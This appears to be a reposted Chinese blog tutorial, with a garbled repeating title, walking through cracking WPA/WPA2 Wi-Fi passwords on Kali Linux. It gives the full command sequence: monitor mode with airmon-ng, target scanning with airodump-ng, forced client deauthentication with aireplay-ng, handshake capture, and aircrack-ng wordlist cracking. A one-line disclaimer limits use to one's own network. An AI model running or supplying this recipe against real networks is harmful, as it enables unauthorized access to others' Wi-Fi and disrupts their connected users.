快捷搜索:  汽车  科技

有没有过时:即便现在已经过时

有没有过时:即便现在已经过时wlan0:系统上的第一个无线网络接口。(这就是我们需要的。)l0:环回接口ifconfig这里,eth0:第一个以太网接口

“ Hacking Wifi”听起来很酷很有趣。但是实际上,拥有良好的词汇表实际上可以轻松破解wifi。但是这个词汇表是没有用的,除非我们不知道如何实际使用该单词列表来破解哈希。在破解哈希之前,我们实际上需要生成哈希。因此,以下是这些步骤以及一些不错的词汇表,它们可以破解WPA / WPA2 wifi。

注意:以下方法仅在您自己的wifi上或在拥有者许可下用于教育/测试目的。请勿将其用于恶意目的。

因此,启动Kali Linux。打开终端窗口。并执行以下步骤。

步骤1:ifconfig(接口配置):查看或更改系统上网络接口的配置。

ifconfig

有没有过时:即便现在已经过时(1)

这里,

eth0:第一个以太网接口

l0:环回接口

wlan0:系统上的第一个无线网络接口。(这就是我们需要的。)

步骤2:停止当前使用WiFi接口的进程。

airmon-ng check kill

有没有过时:即便现在已经过时(2)

步骤3:在监控模式下启动wlan0 。

airmon-ng start wlan0

有没有过时:即便现在已经过时(3)

步骤4:查看您周围的所有Wifi网络。

airodump-ng wlan0mon

有没有过时:即便现在已经过时(4)

这里,

  • airodump-ng:用于数据包捕获
  • wlan0mon:接口名称(此名称在不同设备上可以不同)

找到目标网络后,按Ctrl C可以停止该过程。

步骤5:查看连接到目标网络的客户端。

airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w / root wlan0mon

有没有过时:即便现在已经过时(5)

这里,

  • airodump-ng:用于数据包捕获
  • -c:频道
  • –bssid:无线访问点(WAP)的MAC地址。
  • -w:您要保存文件(密码文件)的目录。
  • wlan0mon:接口名称。

步骤6:打开一个新的终端窗口以断开连接到目标网络的客户端。

aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon

有没有过时:即便现在已经过时(6)

  • aireplay-ng:注入帧
  • -0:用于取消认证
  • 10:发送的去认证报文数
  • -a:对于目标网络的bssid
  • wlan0mon:接口名称。

客户端与目标网络断开连接时。他尝试重新连接到网络,当他这样做时,您将在终端的上一个窗口中得到称为WPA握手的信息。

有没有过时:即便现在已经过时(7)

现在,我们完成了捕获数据包的工作。因此,现在您可以关闭终端窗口。

步骤7.解密密码。打开文件应用程序。

有没有过时:即便现在已经过时(8)

这里,

  • hacking-01.cap是您需要的文件。aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap
  • aircrack-ng:802.11WEPWPA-PSK密钥破解程序
  • -a:用于WPA2的-a2和-用于WPA网络的-a
  • -b:目标网络的BSSID
  • -w:单词表文件的位置
  • /root/hacking-01.cap:cap文件的位置

您可以从互联网上下载常用密码文件,如果要创建自己的文件,则可以使用紧缩工具

有没有过时:即便现在已经过时(9)

猜您喜欢: